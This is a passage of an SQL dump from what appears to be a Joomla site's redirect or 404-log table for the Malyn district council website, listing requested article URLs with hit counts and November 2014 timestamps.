19:24:38','0000-00-00 00:00:00',301),(9487,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=en','','','',5,0,'2014-11-02 19:27:04','0000-00-00 00:00:00',301),(9488,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=985:2013-04-12-09-53-08&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-02 19:49:34','0000-00-00 00:00:00',301),(9489,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-02 20:13:16','0000-00-00 00:00:00',301),(9490,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=uk','','','',7,0,'2014-11-02 20:13:49','0000-00-00 00:00:00',301),(9491,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=en','','','',4,0,'2014-11-02 20:14:57','0000-00-00 00:00:00',301),(9492,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=en','','','',4,0,'2014-11-02 20:16:06','0000-00-00 00:00:00',301),(9493,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=en','','','',4,0,'2014-11-02 20:17:14','0000-00-00 00:00:00',301),(9494,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1089:-l-r-&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-02 20:28:59','0000-00-00 00:00:00',301),(9495,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=979:2013-03-29-09-18-27&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-02 20:29:02','0000-00-00 00:00:00',301),(9496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58&Itemid=105&lang=en','','','',4,0,'2014-11-02 20:29:18','0000-00-00 00:00:00',301),(9497,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1331:2014-06-04-07-15-27&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-02 20:58:51','0000-00-00 00:00:00',301),(9498,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1022:-lr-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-02 20:58:53','0000-00-00 00:00:00',301),(9499,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1023:-l-28r-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 20:58:56','0000-00-00 00:00:00',301),(9500,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1081:-2013-2017-&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-02 21:24:28','0000-00-00 00:00:00',301),(9501,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1083:------------2014-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-02 22:59:05','0000-00-00 00:00:00',301),(9502,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=en','','','',2,0,'2014-11-02 23:10:21','0000-00-00 00:00:00',301),(9503,'http://www.malyn-rayrada.org.ua/egana/components/com_community/index.html','','','',1,0,'2014-11-03 00:09:43','0000-00-00 00:00:00',301),(9504,'http://www.malyn-rayrada.org.ua/egana/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-03 00:09:55','0000-00-00 00:00:00',301),(9505,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48&id=961:2013-03-11-10-51-56&lang=en&option=com_content&view=article','','','',1,0,'2014-11-03 00:10:05','0000-00-00 00:00:00',301),(9506,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1219:-2004-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-03 00:33:45','0000-00-00 00:00:00',301),(9507,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1339:2014-06-12-09-22-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-03 02:09:20','0000-00-00 00:00:00',301),(9508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-03 02:15:04','0000-00-00 00:00:00',301),(9509,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1099:------------------l-r&lang=ru&option=com_content&view=article','','','',6,0,'2014-11-03 02:46:39','0000-00-00 00:00:00',301),(9510,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1140:80-1932-33-l-r&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-03 03:44:06','0000-00-00 00:00:00',301),(9511,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=en','','','',2,0,'2014-11-03 05:38:38','0000-00-00 00:00:00',301),(9512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-03 05:53:37','0000-00-00 00:00:00',301),(9513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=uk','','','',3,0,'2014-11-03 06:49:04','0000-00-00 00:00:00',301),(9514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=uk','','','',4,0,'2014-11-03 06:50:33','0000-00-00 00:00:00',301),(9515,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1338:2014-06-11-14-18-06&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-03 06:53:18','0000-00-00 00:00:00',301),(9516,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=987:2013-04-15-06-06-41&lang=en&option=com_content&view=article','','','',1,0,'2014-11-03 06:53:21','0000-00-00 00:00:00',301),(9517,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1192:-2014-2015-&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-03 06:53:23','0000-00-00 00:00:00',301),(9518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=uk','','','',5,0,'2014-11-03 07:43:04','0000-00-00 00:00:00',301),(9519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-03 07:52:00','0000-00-00 00:00:00',301),(9520,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1134:-25-6-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-03 08:07:04','0000-00-00 00:00:00',301),(9521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=ru','','','',5,0,'2014-11-03 08:08:59','0000-00-00 00:00:00',301),(9522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=uk','','','',4,0,'2014-11-03 08:10:07','0000-00-00 00:00:00',301),(9523,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=uk','','','',4,0,'2014-11-03 08:16:00','0000-00-00 00:00:00',301),(9524,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-03 08:17:10','0000-00-00 00:00:00',301),(9525,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=ru','','','',5,0,'2014-11-03 08:31:41','0000-00-00 00:00:00',301),(9526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-03 08:49:31','0000-00-00 00:00:00',301),(9527,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-03 08:57:43','0000-00-00 00:00:00',301),(9528,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1123:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-03 09:04:22','0000-00-00 00:00:00',301),(9529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=uk','','','',3,0,'2014-11-03 09:05:17','0000-00-00 00:00:00',301),(9530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-03 09:15:42','0000-00-00 00:00:00',301),(9531,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=uk','','','',5,0,'2014-11-03 09:28:30','0000-00-00 00:00:00',301),(9532,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-03 09:29:54','0000-00-00 00:00:00',301),(9533,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1224:----25--2014-&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-03 09:42:27','0000-00-00 00:00:00',301),(9534,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1179:2014-01-21-12-44-04&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-03 09:42:32','0000-00-00 00:00:00',301),(9535,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1122:-1-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-03 09:42:34','0000-00-00 00:00:00',301),(9536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=ru','','','',8,0,'2014-11-03 09:48:02','0000-00-00 00:00:00',301),(9537,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 09:59:47','0000-00-00 00:00:00',301),(9538,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 09:59:52','0000-00-00 00:00:00',301),(9539,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:00:03','0000-00-00 00:00:00',301),(9540,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:00:08','0000-00-00 00:00:00',301),(9541,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:00:12','0000-00-00 00:00:00',301),(9542,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=en','','','',1,0,'2014-11-03 10:00:16','0000-00-00 00:00:00',301),(9543,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=en','','','',1,0,'2014-11-03 10:00:24','0000-00-00 00:00:00',301),(9544,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=en','','','',1,0,'2014-11-03 10:00:28','0000-00-00 00:00:00',301),(9545,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=en','','','',1,0,'2014-11-03 10:00:35','0000-00-00 00:00:00',301),(9546,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=en','','','',1,0,'2014-11-03 10:00:37','0000-00-00 00:00:00',301),(9547,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:00:47','0000-00-00 00:00:00',301),(9548,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:01:03','0000-00-00 00:00:00',301),(9549,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=en','','','',2,0,'2014-11-03 10:01:06','0000-00-00 00:00:00',301),(9550,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:01:12','0000-00-00 00:00:00',301),(9551,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:01:14','0000-00-00 00:00:00',301),(9552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 10:01:17','0000-00-00 00:00:00',301),(9553,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=en','','','',2,0,'2014-11-03 10:01:28','0000-00-00 00:00:00',301),(9554,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52&Itemid=93&lang=en','','','',1,0,'2014-11-03 10:01:31','0000-00-00 00:00:00',301),(9555,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=en','','','',1,0,'2014-11-03 10:01:38','0000-00-00 00:00:00',301),(9556,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=en','','','',1,0,'2014-11-03 10:01:42','0000-00-00 00:00:00',301),(9557,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=en','','','',1,0,'2014-11-03 10:01:54','0000-00-00 00:00:00',301),(9558,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56&Itemid=97&lang=en','','','',1,0,'2014-11-03 10:02:26','0000-00-00 00:00:00',301),(9559,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56&Itemid=97&lang=en','','','',1,0,'2014-11-03 10:02:28','0000-00-00 00:00:00',301),(9560,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56&Itemid=97&lang=en','','','',1,0,'2014-11-03 10:02:45','0000-00-00 00:00:00',301),(9561,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56&Itemid=97&lang=en','','','',1,0,'2014-11-03 10:02:54','0000-00-00 00:00:00',301),(9562,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=en','','','',1,0,'2014-11-03 10:03:07','0000-00-00 00:00:00',301),(9563,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=en','','','',1,0,'2014-11-03 10:03:10','0000-00-00 00:00:00',301),(9564,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56&Itemid=97&lang=en','','','',1,0,'2014-11-03 10:03:14','0000-00-00 00:00:00',301),(9565,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=en','','','',1,0,'2014-11-03 10:03:18','0000-00-00 00:00:00',301),(9566,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57&Itemid=98&lang=en','','','',3,0,'2014-11-03 10:03:32','0000-00-00 00:00:00',301),(9567,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=en','','','',1,0,'2014-11-03 10:03:35','0000-00-00 00:00:00',301),(9568,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=en','','','',1,0,'2014-11-03 10:04:00','0000-00-00 00:00:00',301),(9569,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=en','','','',1,0,'2014-11-03 10:04:14','0000-00-00 00:00:00',301),(9570,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=en','','','',1,0,'2014-11-03 10:04:23','0000-00-00 00:00:00',301),(9571,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=en','','','',5,0,'2014-11-03 10:04:25','0000-00-00 00:00:00',301),(9572,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=en','','','',1,0,'2014-11-03 10:04:33','0000-00-00 00:00:00',301),(9573,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=en','','','',2,0,'2014-11-03 10:04:46','0000-00-00 00:00:00',301),(9574,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=ru','','','',2,0,'2014-11-03 10:04:49','0000-00-00 00:00:00',301),(9575,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=en','','','',6,0,'2014-11-03 10:04:59','0000-00-00 00:00:00',301),(9576,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=en','','','',1,0,'2014-11-03 10:05:08','0000-00-00 00:00:00',301),(9577,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-03 10:05:12','0000-00-00 00:00:00',301),(9578,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=en','','','',1,0,'2014-11-03 10:05:23','0000-00-00 00:00:00',301),(9579,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=ru','','','',1,0,'2014-11-03 10:05:26','0000-00-00 00:00:00',301),(9580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-03 10:08:15','0000-00-00 00:00:00',301),(9581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-03 10:08:31','0000-00-00 00:00:00',301),(9582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',1,0,'2014-11-03 10:09:21','0000-00-00 00:00:00',301),(9583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-03 10:09:55','0000-00-00 00:00:00',301),(9584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-03 10:10:04','0000-00-00 00:00:00',301),(9585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=ru','','','',3,0,'2014-11-03 10:15:20','0000-00-00 00:00:00',301),(9586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-03 10:16:20','0000-00-00 00:00:00',301),(9587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-03 10:30:46','0000-00-00 00:00:00',301),(9588,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=ru','','','',6,0,'2014-11-03 10:45:03','0000-00-00 00:00:00',301),(9589,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=uk','','','',5,0,'2014-11-03 10:45:07','0000-00-00 00:00:00',301),(9590,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=ru','','','',5,0,'2014-11-03 10:46:14','0000-00-00 00:00:00',301),(9591,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=uk','','','',5,0,'2014-11-03 10:46:17','0000-00-00 00:00:00',301),(9592,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-03 10:53:44','0000-00-00 00:00:00',301),(9593,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1005:-7-1943-&lang=en&option=com_content&view=article','','','',1,0,'2014-11-03 11:18:05','0000-00-00 00:00:00',301),(9594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=uk&Itemid=','','','',2,0,'2014-11-03 12:27:28','0000-00-00 00:00:00',301),(9595,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1139:---------14112013--84-l--25-----6-r&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-03 12:53:30','0000-00-00 00:00:00',301),(9596,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-03 12:53:32','0000-00-00 00:00:00',301),(9597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-03 13:02:27','0000-00-00 00:00:00',301),(9598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-03 13:02:33','0000-00-00 00:00:00',301),(9599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-03 13:02:41','0000-00-00 00:00:00',301),(9600,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:03:04','0000-00-00 00:00:00',301),(9601,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:03:13','0000-00-00 00:00:00',301),(9602,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51&Itemid=92&lang=ru','','','',2,0,'2014-11-03 13:03:16','0000-00-00 00:00:00',301),(9603,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 13:03:21','0000-00-00 00:00:00',301),(9604,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:03:25','0000-00-00 00:00:00',301),(9605,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:03:31','0000-00-00 00:00:00',301),(9606,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 13:03:33','0000-00-00 00:00:00',301),(9607,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:03:35','0000-00-00 00:00:00',301),(9608,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51&Itemid=92&lang=ru','','','',2,0,'2014-11-03 13:03:41','0000-00-00 00:00:00',301),(9609,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 13:03:44','0000-00-00 00:00:00',301),(9610,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:03:54','0000-00-00 00:00:00',301),(9611,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=ru','','','',1,0,'2014-11-03 13:03:56','0000-00-00 00:00:00',301),(9612,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=ru','','','',2,0,'2014-11-03 13:03:59','0000-00-00 00:00:00',301),(9613,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=ru','','','',1,0,'2014-11-03 13:04:02','0000-00-00 00:00:00',301),(9614,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:04:08','0000-00-00 00:00:00',301),(9615,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=ru','','','',1,0,'2014-11-03 13:04:10','0000-00-00 00:00:00',301),(9616,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:04:15','0000-00-00 00:00:00',301),(9617,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:04:18','0000-00-00 00:00:00',301),(9618,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:04:25','0000-00-00 00:00:00',301),(9619,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-03 13:04:36','0000-00-00 00:00:00',301),(9620,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:04:38','0000-00-00 00:00:00',301),(9621,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=ru','','','',1,0,'2014-11-03 13:04:41','0000-00-00 00:00:00',301),(9622,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:04:45','0000-00-00 00:00:00',301),(9623,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-03 13:04:50','0000-00-00 00:00:00',301),(9624,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:02','0000-00-00 00:00:00',301),(9625,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51&Itemid=92&lang=ru','','','',2,0,'2014-11-03 13:05:04','0000-00-00 00:00:00',301),(9626,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:07','0000-00-00 00:00:00',301),(9627,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52&Itemid=93&lang=ru','','','',1,0,'2014-11-03 13:05:09','0000-00-00 00:00:00',301),(9628,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=ru','','','',2,0,'2014-11-03 13:05:12','0000-00-00 00:00:00',301),(9629,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:14','0000-00-00 00:00:00',301),(9630,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:16','0000-00-00 00:00:00',301),(9631,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=en','','','',2,0,'2014-11-03 13:05:25','0000-00-00 